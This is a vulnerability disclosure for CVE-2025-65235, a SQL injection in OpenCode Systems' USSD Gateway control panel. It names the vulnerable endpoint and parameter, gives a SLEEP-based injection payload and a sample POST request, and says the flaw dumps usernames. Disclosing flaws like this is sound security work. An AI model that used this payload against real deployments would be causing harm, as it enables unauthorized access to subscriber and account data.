[CVE-2025-65235] USSD GW SQL Injection - SubUsers
Technical information about the CVE-2025-65235 in OpenCode USSD GW application.
Description
SQL Injection in the USSD Gateway application offered by OpenCode Systems allows the user who has an access to the vulnerable function to dump the database by injecting SQL commands. https://www.cve.org/CVERecord?id=CVE-2025-65235
Application Details
Name: USSD Gateway
Vendor: OpenCode Systems
Version: OC Release 5 - Version 6.13.11
Technical Details
Vulnerable Endpoint:
/occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProviderVulnerable Parameter:
account_idPayload Sample:
account_id=1; SELECT SLEEP(5)#
Exploitation
The default request is being used to get the username of the account details based on the account ID, the response is shown below
POST /occontrolpanel/index.php?w=occampaigns&op=SubUsers&op_func=getSubUsersByProvider HTTP/2
Host: DOMAIN
Cookie: OCPANEL-SESSIONID=9j[...]fmla; openid-state=65c[...]pao%22%3B%7D; _csrf=8643[...]63a_A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
[...]
account_id=1By appending the payload to the parameter, all the usernames will be shown in the response.
You can use different payloads, the below one was used as a POC
Nuclei Template
You can use this template for easy detection.
Last updated